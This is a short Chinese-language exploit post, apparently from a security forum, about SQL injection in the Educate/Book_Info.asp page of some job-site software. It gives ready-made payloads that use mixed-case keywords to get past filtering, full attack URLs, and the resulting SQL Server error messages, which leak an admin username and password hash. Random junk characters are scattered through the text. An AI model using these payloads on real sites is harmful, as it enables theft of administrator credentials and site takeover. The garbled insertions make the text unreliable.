漏洞出现在Educate/Book_Info.asp
: G, _0 m Q U7 u e( Y此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
1 G% G. B( D# \/ Y' p% D& N5 G! Xexp:如下% K3 @% }5 S% |9 |) g' ~( e+ I
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, F6 L6 U8 g# C查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ y1 e* k2 o; U! I1 ], e: Jhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 [: p, e. E8 D0 D1 @6 _3 MMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! e* _5 n8 L$ Z7 s3 M0 J将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. o* u& v9 a" q! q, f/ r) H8 U+ m8 h/Educate/Book_Info.asp,行 88 N) a8 L( n+ t9 M/ w6 i
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper) w! \1 c1 m6 c; N" ]; ^4 h
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ M5 Z% |' m% D: `0 i6 Q将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" ?; [+ T: N9 ]0 @1 U" U' S
/Educate/Book_Info.asp,行 8 |